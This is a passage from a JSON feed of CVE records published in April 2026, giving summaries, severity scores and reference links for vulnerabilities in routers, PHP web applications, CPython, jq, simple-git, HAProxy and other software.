The exploit has been publicly disclosed and may be utilized.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/F456/vul_117/README.md","https://vuldb.com/submit/797472","https://vuldb.com/vuln/357122","https://vuldb.com/vuln/357122/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T19:16:58","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6197","summary":"A flaw has been found in Tenda F456 1.0.0.5. This vulnerability affects the function formWrlsafeset of the file /goform/AdvSetWrlsafeset. Executing a manipulation of the argument mit_ssid can lead to stack-based buffer overflow. The attack may be performed from remote. The exploit has been published and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/F456/vul_114/README.md","https://vuldb.com/submit/797468","https://vuldb.com/vuln/357119","https://vuldb.com/vuln/357119/cti","https://www.tenda.com.cn/","https://github.com/Litengzheng/vuldb_new/blob/main/F456/vul_114/README.md"],"published_time":"2026-04-13T19:16:57","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6198","summary":"A vulnerability has been found in Tenda F456 1.0.0.5. This issue affects the function fromNatStaticSetting of the file /goform/NatStaticSetting. The manipulation of the argument page leads to stack-based buffer overflow. It is possible to initiate the attack remotely. 
The exploit has been disclosed to the public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/F456/vul_115/README.md","https://vuldb.com/submit/797470","https://vuldb.com/vuln/357120","https://vuldb.com/vuln/357120/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T19:16:57","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40043","summary":"Pachno 1.0.6 contains an authentication bypass vulnerability in the runSwitchUser() action that allows authenticated low-privilege users to escalate privileges by manipulating the original_username cookie. Attackers can set the client-controlled original_username cookie to any value and request a switch to user ID 1 to obtain session tokens or password hashes belonging to administrator accounts.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00073,"ranking_epss":0.22122,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-authentication-bypass-via-runswitchuser","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5985.php","https://www.zeroscience.mk/#/advisories/ZSL-2026-5985"],"published_time":"2026-04-13T19:16:52","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40044","summary":"Pachno 1.0.6 contains a deserialization vulnerability that allows unauthenticated attackers to execute arbitrary code by injecting malicious serialized objects into cache files. 
Attackers can write PHP object payloads to world-writable cache files with predictable names in the cache directory, which are unserialized during framework bootstrap before authentication checks occur.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":9.3,"epss":0.00136,"ranking_epss":0.33334,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-filecache-deserialization-remote-code-execution","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5986.php"],"published_time":"2026-04-13T19:16:52","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40038","summary":"Pachno 1.0.6 contains a stored cross-site scripting vulnerability that allows attackers to execute arbitrary HTML and script code by injecting malicious payloads into POST parameters. Attackers can inject scripts through the value, comment_body, article_content, description, and message parameters across multiple controllers, which are stored in the database and executed in users' browser sessions due to improper sanitization via Request::getRawParameter() or Request::getParameter() calls.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":5.1,"epss":0.00029,"ranking_epss":0.08061,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-stored-cross-site-scripting-via-multiple-parameters","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5980.php"],"published_time":"2026-04-13T19:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40039","summary":"Pachno 1.0.6 contains an open redirection vulnerability that allows attackers to redirect users to arbitrary external websites by manipulating the return_to parameter. 
Attackers can craft malicious login URLs with unvalidated return_to values to conduct phishing attacks and steal user credentials.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00032,"ranking_epss":0.08977,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-open-redirection-via-return-to-parameter","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5981.php"],"published_time":"2026-04-13T19:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40040","summary":"Pachno 1.0.6 contains an unrestricted file upload vulnerability that allows authenticated users to upload arbitrary file types by bypassing ineffective extension filtering to the /uploadfile endpoint. Attackers can upload executable files such as .php5 scripts to web-accessible directories and execute them to achieve remote code execution on the server.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00099,"ranking_epss":0.2747,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-unrestricted-file-upload-remote-code-execution","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5982.php"],"published_time":"2026-04-13T19:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40041","summary":"Pachno 1.0.6 contains a cross-site request forgery vulnerability that allows attackers to perform arbitrary actions in authenticated user context by exploiting missing CSRF protections on state-changing endpoints. 
Attackers can craft malicious requests targeting login, registration, file upload, milestone editing, and administrative functions to force logout, create accounts, modify roles, inject comments, or upload files when authenticated users visit attacker-controlled websites.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00014,"ranking_epss":0.02686,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-cross-site-request-forgery-via-state-changing-endpoints","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5983.php"],"published_time":"2026-04-13T19:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40042","summary":"Pachno 1.0.6 contains an XML external entity injection vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting unsafe XML parsing in the TextParser helper. Attackers can inject malicious XML entities through wiki table syntax and inline tags in issue descriptions, comments, and wiki articles to trigger entity resolution via simplexml_load_string() without LIBXML_NONET restrictions.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":9.3,"epss":0.00045,"ranking_epss":0.13809,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-wiki-textparser-xml-external-entity-injection","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5984.php"],"published_time":"2026-04-13T19:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-29955","summary":"The `/registercrd` endpoint in KubePlus 4.14 in the kubeconfiggenerator component is vulnerable to command injection. The component uses `subprocess.Popen()` with `shell=True` parameter to execute shell commands, and the user-supplied `chartName` parameter is directly concatenated into the command string without any sanitization or validation. 
An attacker can inject arbitrary shell commands by crafting a malicious `chartName` parameter value.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11645,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gist.github.com/b0b0haha/f011fdd69adc3ae272a4e3b99af90163","https://github.com/b0b0haha/CVE-2026-29955/blob/main/README.md"],"published_time":"2026-04-13T19:16:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6194","summary":"A weakness has been identified in Totolink A3002MU B20211125.1046. Affected by this vulnerability is the function sub_410188 of the file /boafrm/formWlanSetup of the component HTTP Request Handler. This manipulation of the argument wan-url causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00077,"ranking_epss":0.22868,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/zhuchan770/vulnerability/blob/main/A3002MU/formWlanSetup/ToToLinkA3002MU%20formWlanSetup%20339996b67c9780caafb2d351dfd8a889.md","https://vuldb.com/submit/797452","https://vuldb.com/vuln/357116","https://vuldb.com/vuln/357116/cti","https://www.totolink.net/"],"published_time":"2026-04-13T18:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6195","summary":"A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this issue is the function setPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument admpass leads to os command injection. The attack can be executed remotely. 
The exploit has been disclosed publicly and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_198/README.md","https://vuldb.com/submit/797460","https://vuldb.com/vuln/357117","https://vuldb.com/vuln/357117/cti","https://www.totolink.net/"],"published_time":"2026-04-13T18:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6196","summary":"A vulnerability was detected in Tenda F456 1.0.0.5. This affects the function fromexeCommand of the file /goform/exeCommand. Performing a manipulation of the argument cmdinput results in stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/F456/vul_113/README.md","https://vuldb.com/submit/797467","https://vuldb.com/vuln/357118","https://vuldb.com/vuln/357118/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T18:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6100","summary":"Use-after-free (UAF) was possible in the `lzma.LZMADecompressor`, `bz2.BZ2Decompressor`, and `gzip.GzipFile` when a memory allocation fails with a `MemoryError` and the decompression instance is re-used. This scenario can be triggered if the process is under memory pressure. The fix cleans up the dangling pointer in this specific error condition.\n\nThe vulnerability is only present if the program re-uses decompressor instances across multiple decompression calls even after a `MemoryError` is raised during decompression. 
Using the helper functions to one-shot decompress data such as `lzma.decompress()`, `bz2.decompress()`, `gzip.decompress()`, and `zlib.decompress()` are not affected as a new decompressor instance is used per call. If the decompressor instance is not re-used after an error condition, this usage is similarly not vulnerable.","cvss":9.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.1,"epss":0.0005,"ranking_epss":0.15501,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/python/cpython/commit/47128e64f98c3a20271138a98c2922bea2a3ee0e","https://github.com/python/cpython/commit/6a5f79c8d7bbf22b083b240910c7a8781a59437d","https://github.com/python/cpython/commit/8fc66aef6d7b3ae58f43f5c66f9366cc8cbbfcd2","https://github.com/python/cpython/commit/c3cf71c3366fe49acb776a639405c0eea6169c20","https://github.com/python/cpython/commit/e20c6c9667c99ecaab96e1a2b3767082841ffc8b","https://github.com/python/cpython/issues/148395","https://github.com/python/cpython/pull/148396","https://mail.python.org/archives/list/security-announce@python.org/thread/HTWB2Z6KT5QQX4RYEZAFININDHNOSIF3/","http://www.openwall.com/lists/oss-security/2026/04/13/10"],"published_time":"2026-04-13T18:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32316","summary":"jq is a command-line JSON processor. An integer overflow vulnerability exists through version 1.8.1 within the jvp_string_append() and jvp_string_copy_replace_bad functions, where concatenating strings with a combined length exceeding 2^31 bytes causes a 32-bit unsigned integer overflow in the buffer allocation size calculation, resulting in a drastically undersized heap buffer. Subsequent memory copy operations then write the full string data into this undersized buffer, causing a heap buffer overflow classified as CWE-190 (Integer Overflow) leading to CWE-122 (Heap-based Buffer Overflow). 
Any system evaluating untrusted jq queries is affected, as an attacker can crash the process or potentially achieve further exploitation through heap corruption by crafting queries that produce extremely large strings. The root cause is the absence of string size bounds checking, unlike arrays and objects which already have size limits. The issue has been addressed in commit e47e56d226519635768e6aab2f38f0ab037c09e5.","cvss":8.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.2,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.11987,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jqlang/jq/commit/e47e56d226519635768e6aab2f38f0ab037c09e5","https://github.com/jqlang/jq/security/advisories/GHSA-q3h9-m34w-h76f"],"published_time":"2026-04-13T18:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-28291","summary":"simple-git enables running native Git commands from JavaScript. Versions up to and including 3.31.1 allow execution of arbitrary commands through Git option manipulation, bypassing safety checks meant to block dangerous options like -u and --upload-pack. The flaw stems from an incomplete fix for CVE-2022-25860, as Git's flexible option parsing allows numerous character combinations (e.g., -vu, -4u, -nu) to circumvent the regular-expression-based blocklist in the unsafe operations plugin. Due to the virtually infinite number of valid option variants that Git accepts, a complete blocklist-based mitigation may be infeasible without fully emulating Git's option parsing behavior. 
This issue has been fixed in version 3.32.0.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00095,"ranking_epss":0.26379,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/steveukx/git-js/blob/789c13ebabcf18ebe0b3a0c88ebb4037dede42e3/simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts#L26","https://github.com/steveukx/git-js/commit/1effd8e5012a5da05a9776512fac3e39b11f2d2d","https://github.com/steveukx/git-js/releases/tag/simple-git%403.32.0","https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287","https://www.cve.org/CVERecord?id=CVE-2022-25860","https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287"],"published_time":"2026-04-13T18:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-3756","summary":"A vulnerability exists in the command handling of the IEC 61850 communication stack included in the product revisions listed as affected in this CVE. An attacker with access to IEC 61850 networks could exploit the vulnerability by using a specially crafted 61850 packet, forcing the communication interfaces of the PM 877, CI850 and CI868 modules into fault mode or causing unavailability of the S+ Operations 61850 connectivity, resulting in a denial-of-service situation. \n\n\n\n\nThe System 800xA IEC61850 Connect is not affected. 
Note: This vulnerability does not impact on the overall availability and functionality of the S+ Operations node, only the 61850 communication function.\n\n   \n\n\n\nThis issue affects AC800M (System 800xA): from 6.0.0x through 6.0.0303.0, from 6.1.0x through 6.1.0031.0, from 6.1.1x through 6.1.1004.0, from 6.1.1x through 6.1.1202.0, from 6.2.0x through 6.2.0006.0; Symphony Plus SD Series: A_0, A_1, A_2.003, A_3.005, A_4.001, B_0.005; Symphony Plus MR (Melody Rack): from 3.10 through 3.52; S+ Operations: 2.1, 2.2, 2.3, 3.3.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00023,"ranking_epss":0.06121,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://search.abb.com/library/Download.aspx?DocumentID=7PAA020125&LanguageCode=en&DocumentPartId=&Action=Launch"],"published_time":"2026-04-13T18:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6191","summary":"A vulnerability was determined in itsourcecode Construction Management System 1.0. This affects an unknown function of the file /equipments.php. Executing a manipulation of the argument Name can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ltranquility/cve_submit/issues/16","https://itsourcecode.com/","https://vuldb.com/submit/797384","https://vuldb.com/vuln/357113","https://vuldb.com/vuln/357113/cti"],"published_time":"2026-04-13T17:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6192","summary":"A vulnerability was identified in uclouvain openjpeg up to 2.5.4. This impacts the function opj_pi_initialise_encode in the library src/lib/openjp2/pi.c. The manipulation leads to integer overflow. 
The attack must be carried out locally. The exploit is publicly available and might be used. The identifier of the patch is 839936aa33eb8899bbbd80fda02796bb65068951. It is suggested to install a patch to address this issue.","cvss":4.8,"cvss_version":4.0,"cvss_v2":1.7,"cvss_v3":3.3,"cvss_v4":4.8,"epss":0.00013,"ranking_epss":0.02047,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/uclouvain/openjpeg/","https://github.com/uclouvain/openjpeg/commit/839936aa33eb8899bbbd80fda02796bb65068951","https://github.com/uclouvain/openjpeg/issues/1619","https://github.com/uclouvain/openjpeg/pull/1628","https://vuldb.com/submit/797385","https://vuldb.com/vuln/357114","https://vuldb.com/vuln/357114/cti"],"published_time":"2026-04-13T17:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6193","summary":"A security flaw has been discovered in PHPGurukul Daily Expense Tracking System 1.1. Affected is an unknown function of the file /register.php. The manipulation of the argument email results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/f1rstb100d/CVE/issues/47","https://phpgurukul.com/","https://vuldb.com/submit/797433","https://vuldb.com/vuln/357115","https://vuldb.com/vuln/357115/cti"],"published_time":"2026-04-13T17:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6189","summary":"A vulnerability has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. The affected element is an unknown function of the file /ajax.php?action=login. Such manipulation of the argument Username leads to sql injection. It is possible to launch the attack remotely. 
The exploit has been disclosed to the public and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/lingzezzz/lingze/issues/1","https://vuldb.com/submit/797377","https://vuldb.com/vuln/357111","https://vuldb.com/vuln/357111/cti","https://www.sourcecodester.com/"],"published_time":"2026-04-13T17:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6190","summary":"A vulnerability was found in itsourcecode Construction Management System 1.0. The impacted element is an unknown function of the file /employees.php. Performing a manipulation of the argument Name results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ltranquility/cve_submit/issues/15","https://itsourcecode.com/","https://vuldb.com/submit/797383","https://vuldb.com/vuln/357112","https://vuldb.com/vuln/357112/cti"],"published_time":"2026-04-13T17:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39940","summary":"ChurchCRM is an open-source church management system. Prior to 7.0.0, it was possible in many places across the ChurchCRM application to create a link that, when visited by an authenticated user, would redirect them to any URL chosen by an attacker if they clicked the 'Cancel' button on the page. For this write-up, DonatedItemEditor.php will be used as an example; however, all instances of 'linkBack' should be assessed. 
This vulnerability is fixed in 7.0.0.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00038,"ranking_epss":0.11431,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ChurchCRM/CRM/security/advisories/GHSA-5g52-rvjf-6wwf","https://github.com/ChurchCRM/CRM/security/advisories/GHSA-v3hj-33xf-qx47"],"published_time":"2026-04-13T17:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36950","summary":"Sourcecodester Online Thesis Archiving System v1.0 is vulnerable to SQL injection in /otas/projects_per_department.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-thesis-archiving-system/SQL-2.md"],"published_time":"2026-04-13T17:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36952","summary":"Sourcecodester Online Thesis Archiving System v1.0 is vulnerable to SQL injection in the file /otas/admin/curriculum/manage_curriculum.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-thesis-archiving-system/SQL-5.md"],"published_time":"2026-04-13T17:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23891","summary":"Decidim is a participatory democracy framework. In versions below 0.30.5 and 0.31.0.rc1 through 0.31.0, a stored code execution vulnerability in the user name field allows a low-privileged attacker to execute arbitrary code in the context of any user who passively visits a comment page, resulting in high confidentiality and integrity impact across security boundaries. 
This issue has been fixed in versions 0.30.5 and 0.31.1.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.3,"epss":0.00061,"ranking_epss":0.18876,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/decidim/decidim/releases/tag/v0.30.5","https://github.com/decidim/decidim/releases/tag/v0.31.1","https://github.com/decidim/decidim/security/advisories/GHSA-fc46-r95f-hq7g"],"published_time":"2026-04-13T17:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33555","summary":"An issue was discovered in HAProxy before 3.3.6. The HTTP/3 parser does not check that the received body length matches a previously announced content-length when the stream is closed via a frame with an empty payload. This can cause desynchronization issues with the backend server and could be used for request smuggling. The earliest affected version is 2.6.","cvss":4.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.0,"cvss_v4":null,"epss":9e-05,"ranking_epss":0.00797,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/haproxy/haproxy/commit/05a295441c621089ffa4318daf0dbca2dd756a84","https://www.haproxy.com/documentation/haproxy-aloha/changelog/","https://www.haproxy.org","https://www.mail-archive.com/haproxy@formilux.org/msg46752.html"],"published_time":"2026-04-13T17:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36948","summary":"Sourcecodester Online Thesis Archiving System v1.0 is vulnerable to SQL injection in the file 
/otas/view_archive.php.","cvss":7.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-thesis-archiving-system/SQL-1.md"],"published_time":"2026-04-13T17:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6187","summary":"A vulnerability was detected in SourceCodester Pharmacy Sales and Inventory System 1.0. This issue affects some unknown processing of the file /ajax.php?action=chk_prod_availability. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/lingzezzz/lingze/issues/3","https://vuldb.com/submit/797375","https://vuldb.com/vuln/357109","https://vuldb.com/vuln/357109/cti","https://www.sourcecodester.com/"],"published_time":"2026-04-13T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6188","summary":"A flaw has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. Impacted is an unknown function of the file /ajax.php?action=delete_sales. This manipulation of the argument ID causes sql injection. It is possible to initiate the attack remotely. 
The exploit has been published and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/lingzezzz/lingze/issues/2","https://vuldb.com/submit/797376","https://vuldb.com/vuln/357110","https://vuldb.com/vuln/357110/cti","https://www.sourcecodester.com/"],"published_time":"2026-04-13T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6231","summary":"The bson_validate function may return early on specific inputs and incorrectly report success. This behavior could result in skipping validation for BSON data, allowing malformed or invalid UTF-8 sequences to bypass validation and be processed incorrectly. The issue may affect applications that rely on these functions to validate untrusted BSON data before further processing. This issue affects MongoDB C Driver versions prior to 1.30.5, MongoDB C Driver version 2.0.0 and MongoDB C Driver version 2.0.1","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00042,"ranking_epss":0.12753,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://jira.mongodb.org/browse/CDRIVER-6017"],"published_time":"2026-04-13T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6184","summary":"A weakness has been identified in code-projects Simple Content Management System 1.0. This affects an unknown part of the file /web/admin/welcome.php. Executing a manipulation of the argument News Title can lead to cross site scripting. The attack can be executed remotely. 
The exploit has been made available to the public and could be used for attacks.","cvss":4.8,"cvss_version":4.0,"cvss_v2":3.3,"cvss_v3":2.4,"cvss_v4":4.8,"epss":0.0003,"ranking_epss":0.0845,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/Xmyronn/simple-cms-stored-xss-news-title","https://vuldb.com/submit/797265","https://vuldb.com/vuln/357107","https://vuldb.com/vuln/357107/cti"],"published_time":"2026-04-13T16:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6186","summary":"A security vulnerability has been detected in UTT HiPER 1200GW up to 2.5.3-170306. This vulnerability affects the function strcpy of the file /goform/formNatStaticMap. The manipulation of the argument NatBind leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00041,"ranking_epss":0.12348,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/lin-3-start/lin-cve/blob/main/Amao/1.md","https://vuldb.com/submit/797304","https://vuldb.com/vuln/357108","https://vuldb.com/vuln/357108/cti"],"published_time":"2026-04-13T16:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36938","summary":"Sourcecodester Online Resort Management System v1.0 is vulnerable to SQL injection in /orms/admin/rooms/view_room.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-resort-management-system/SQL-3.md"],"published_time":"2026-04-13T16:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36937","summary":"Sourcecodester Online Resort Management System v1.0 is vulnerable 
to SQL injection in /orms/admin/reservations/view_details.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-resort-management-system/SQL-1.md"],"published_time":"2026-04-13T16:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34186","summary":"Improper Neutralization of Special Elements used in an SQL Command vulnerability allows SQL Injection via custom fields. This issue affects Pandora FMS: from 777 through 800","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.0003,"ranking_epss":0.08432,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34188","summary":"Improper Neutralization of Special Elements used in an OS Command vulnerability allows OS Command Injection via Event Response execution. This issue affects Pandora FMS: from 777 through 800","cvss":7.5,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.5,"epss":0.00359,"ranking_epss":0.58127,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30812","summary":"Improper Neutralization of Input During Web Page Generation vulnerability allows Stored Cross-Site Scripting via event comments. 
